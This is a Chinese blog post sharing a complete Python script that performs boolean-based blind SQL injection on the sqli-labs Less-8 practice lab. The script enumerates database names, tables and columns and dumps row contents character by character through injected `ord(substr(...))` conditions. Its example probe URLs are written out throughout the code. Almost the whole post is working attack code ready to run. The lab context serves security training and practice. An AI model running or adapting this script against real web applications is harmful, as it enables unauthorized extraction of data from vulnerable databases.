我是靠谱客的博主 粗犷狗,这篇文章主要介绍sql-labs第八关python脚本,现在分享给大家,希望可以做个参考。

SQL 布尔盲注（bool-based blind injection）
代码如下:

# Boolean-based blind SQL injection prober for the sqli-labs Less-8 exercise.
#
# Oracle: every probe is one HTTP GET whose `id` parameter is extended with a
# quoted SQL fragment (`' and <condition> --+`). If the page body contains the
# marker `flag`, the condition evaluated true; otherwise false. The script reads
# lengths by counting, and characters by trying every code in `list` for each
# position. This only works when the target interpolates the raw `id` value into
# its SQL text; a parameterized query removes the oracle entirely. On the wire
# it is up to len(list) requests per recovered character, all sharing the same
# `id=1'` prefix — a high-volume, highly regular pattern in access logs.
#
# Outline (numbers match the step comments below):
# 1.  Globals DIS (verbose URL printing) and list (ASCII codes to try).
# 2.  Length of the current database.
# 3.  Brute_length() — length-probing function.
# 4.  Name of the current database.
# 5.  Brute_database() — database-name-probing function.
# 6.  Combined length of all database names.
# 7.  All database names.
# 8.  Table names.
# 9.  Brute_table() — table-name-probing function.
# 10. Column names.
# 11. Brute_column() — column-name-probing function.
# 12. Row data.
# 13. data_dump() — data-probing function.

import requests
import time  # NOTE: only referenced by the commented-out sleep() calls below
import sys   # NOTE: unused

# 1. Globals: DIS toggles printing of every probe URL; list holds the ASCII
#    codes tried for each character, in this order.
DIS = True
# ',' '.' '_' '0'-'9' ':' first, then a-z, '@' and A-Z, then '!'..'K'.
# NOTE: shadows the builtin `list`. The ranges overlap the seed values, so some
# codes are probed twice; a character whose code is absent from this set is
# never matched and is silently skipped (the result is then shorter than the
# probed length).
list = [44, 46, 95, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58]
for i in range(97, 123):
    list.append(i)
for i in range(64, 91):
    list.append(i)
for i in range(33, 76):
    list.append(i)


def sql_Inject(url: str, flag: bytes, display: bool) -> None:
    """Interactive driver: walk databases -> tables -> columns -> data.

    Args:
        url: base request URL, ending in the injectable `id=` value.
        flag: byte string whose presence in the response body means "true".
        display: stored into the global DIS; when true every probe URL is printed.

    Each stage loops until the user answers exactly "no"; any other answer
    repeats the stage. Output is printed, nothing is returned.
    """
    global DIS
    DIS = display
    # 2. Length of the current database (database()).
    current_length = Brute_length(url, flag, current=True)
    print("当前数据库长度:", current_length)
    # 4. Name of the current database, one character at a time.
    current_database_name = Brute_database(url, current_length, flag, current=True)
    print("当前数据库名称:", current_database_name)
    # 6. Length of group_concat(schema_name) — all names joined with commas.
    length = Brute_length(url, flag)
    print("数据库全长:", length)
    # 7. All database names (optional).
    all_databases = input("Brute all the databases?[yes/no]: ")
    if all_databases == 'yes':
        database_name = Brute_database(url, length, flag)
        print("数据库名称:", database_name)
    # 8. Table names of a user-chosen schema.
    while True:
        choose_database = input("choose the database: ")
        table_name = Brute_table(url, choose_database, flag)
        print("数据库: %s" % choose_database)
        print("表: %s" % table_name)
        print('')
        # NOTE: `next` shadows the builtin.
        next = input("continue brute the tables?[yes/no]: ")
        if next == "no":
            break
    # 10. Column names of a user-chosen table.
    while True:
        choose_database = input("choose the database: ")
        choose_table = input("choose the table: ")
        column_name = Brute_column(url, choose_database, choose_table, flag)
        print("表: %s.%s" % (choose_database, choose_table))
        print("字段: %s" % column_name)
        print('')
        next = input("continue brute the columns?[yes/no]: ")
        if next == "no":
            break
    # 12. Row data of a user-chosen column.
    while True:
        choose_database = input("choose the database: ")
        choose_table = input("choose the table: ")
        choose_column = input("choose the column: ")
        data = data_dump(url, choose_database, choose_table, choose_column, flag)
        print("字段: %s.%s.%s" % (choose_database, choose_table, choose_column))
        print("数据: %s" % data)
        print('')
        next = input("continue dump the data?[yes/no]: ")
        if next == "no":
            break


# 13. Data-probing function.
def data_dump(url: str, database: str, table: str, column: str, flag: bytes) -> str:
    """Recover group_concat(column) of database.table via the boolean oracle.

    Args:
        url: base request URL.
        database, table, column: identifiers pasted verbatim into the probe.
        flag: "true" marker searched for in the response body.

    Returns:
        The recovered comma-joined values (possibly shorter than the real
        length if a character is not in `list`).
    """
    raw_url = url
    length = 1
    jump = 10
    data = ""
    # First find the total length: coarse search in steps of 10 ...
    while True:
        # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>10 --+
        url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d --+" % (column, database, table, jump)
        response = requests.get(url)
        if DIS:
            print(url)
        if flag in response.content:
            jump += 10
        else:
            # Step back one decade so the fine loop counts up from jump+1
            # (if the very first probe fails, jump becomes 0).
            jump -= 10
            break
    # ... then fine search, one unit at a time, until "> N" is false.
    while True:
        # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>11 --+
        url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d --+" % (column, database, table, jump + length)
        if DIS:
            print(url)
        response = requests.get(url)
        if flag in response.content:
            length += 1
        else:
            break
    data_length = length + jump
    # Recover each position by testing ord(substr(..., i, 1)) against every
    # code in `list`; the first hit is appended and the position is done.
    for i in range(data_length):
        for ASCII in list:
            # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(id) from security.emails),1,1))='44'--+
            url = raw_url + "' and ord(substr((select group_concat(%s) from %s.%s),%d,1))=%d --+" % (column, database, table, i + 1, ASCII)
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                data += chr(ASCII)
                break
            # time.sleep(5)
    return data


# 11. Column-name-probing function.
def Brute_column(url: str, database: str, table: str, flag: bytes) -> str:
    """Recover group_concat(column_name) for one table from information_schema.

    Same length-then-characters scheme as data_dump(); `database` and `table`
    are pasted verbatim into the probe. Returns the comma-joined column names.
    """
    raw_url = url
    length = 1
    jump = 10
    column_name = ""
    # Coarse length search in steps of 10.
    while True:
        # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'))>10 --+
        url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d --+" % (database, table, jump)
        response = requests.get(url)
        if DIS:
            print(url)
        if flag in response.content:
            jump += 10
        else:
            jump -= 10
            break
    # Fine length search, one unit at a time.
    while True:
        # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 --+
        url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d --+" % (database, table, jump + length)
        if DIS:
            print(url)
        response = requests.get(url)
        if flag in response.content:
            length += 1
        else:
            break
    column_length = length + jump
    # Character-by-character recovery.
    for i in range(column_length):
        for ASCII in list:
            # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),1,1))='44'--+
            url = raw_url + "' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'),%d,1))=%d --+" % (database, table, i + 1, ASCII)
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                column_name += chr(ASCII)
                break
            # time.sleep(5)
    return column_name


# 9. Table-name-probing function.
def Brute_table(url: str, database: str, flag: bytes) -> str:
    """Recover group_concat(table_name) for one schema from information_schema.

    Same length-then-characters scheme as data_dump(). Returns the
    comma-joined table names.
    """
    raw_url = url
    length = 1
    jump = 10
    table_name = ""
    # Coarse length search in steps of 10.
    while True:
        # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>10 --+
        url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d --+" % (database, jump)
        response = requests.get(url)
        if DIS:
            print(url)
        if flag in response.content:
            jump += 10
        else:
            jump -= 10
            break
    # Fine length search, one unit at a time.
    while True:
        # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 --+
        url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d --+" % (database, jump + length)
        if DIS:
            print(url)
        response = requests.get(url)
        if flag in response.content:
            length += 1
        else:
            break
    table_length = length + jump
    # Character-by-character recovery.
    for i in range(table_length):
        for ASCII in list:
            # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))='44'--+
            url = raw_url + "' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1))=%d --+" % (database, i + 1, ASCII)
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                table_name += chr(ASCII)
                break
            # time.sleep(5)
    return table_name


# 5. Database-name-probing function.
def Brute_database(url: str, length: int, flag: bytes, current: bool = False) -> str:
    """Recover a database name string of a known `length`, character by character.

    Args:
        url: base request URL.
        length: number of positions to probe (from Brute_length()).
        flag: "true" marker searched for in the response body.
        current: True -> database(), tried against lowercase a-z only;
                 False -> group_concat(schema_name), tried against `list`.

    Returns:
        The recovered string; positions with no matching code are skipped.
    """
    raw_url = url
    database_name = ""
    # 2. Current database name.
    if current:
        for i in range(length):
            for ASCII in range(97, 123):
                # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr(database(),1,1))=97 --+
                url = raw_url + "' and ord(substr(database(),%d,1))=%d --+" % (i+1, ASCII)
                if DIS:
                    print(url)
                response = requests.get(url)
                if flag in response.content:
                    database_name += chr(ASCII)
                    break
                # time.sleep(5)
        return database_name
    # All database names, comma-joined.
    # ' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=97--+
    else:
        for i in range(length):
            for ASCII in list:
                # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=44--+
                url = raw_url + "' and ord(substr((select group_concat(schema_name) from information_schema.schemata),%d,1))=%d --+" % (i+1, ASCII)
                if DIS:
                    print(url)
                response = requests.get(url)
                if flag in response.content:
                    database_name += chr(ASCII)
                    break
                # time.sleep(5)
        return database_name


# 3. Length-probing function.
def Brute_length(url: str, flag: bytes, current: bool = False) -> int:
    """Find a string length by asking "length(...) > N" until the answer is no.

    Args:
        url: base request URL.
        flag: "true" marker searched for in the response body.
        current: True -> length(database()), counted one unit at a time;
                 False -> length(group_concat(schema_name)), coarse steps of
                 10 followed by a fine count.

    Returns:
        The smallest N for which "length > N" is false, i.e. the length.
    """
    length = 1
    raw_url = url
    jump = 10
    # Which target to measure.
    if current:
        while True:
            # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length(database())>1 --+
            url = raw_url + "' and length(database())>%d --+" % length
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                length += 1
            else:
                break
        return length
    # Combined length of all schema names.
    else:
        # Coarse search in steps of 10.
        while True:
            # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>10 --+
            url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d --+" % jump
            response = requests.get(url)
            if DIS:
                print(url)
            if flag in response.content:
                jump += 10
            else:
                jump -= 10
                break
        # Fine search from jump+1 upward.
        while True:
            # url: http://192.168.11.101/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>1 --+
            url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d --+" % (jump+length)
            if DIS:
                print(url)
            response = requests.get(url)
            if flag in response.content:
                length += 1
            else:
                break
        return (length+jump)


if __name__ == "__main__":
    # Lab target; `flag` is the text the Less-8 page shows for a true condition.
    url = "http://192.168.11.101/sqli-labs/Less-8/?id=1"
    flag = b'You are in...........'
    display = False
    sql_Inject(url, flag, display)

运行效果:

在这里插入图片描述

最后

以上就是粗犷狗最近收集整理的关于sql-labs第八关python脚本的全部内容,更多相关sql-labs第八关python脚本内容请搜索靠谱客的其他文章。
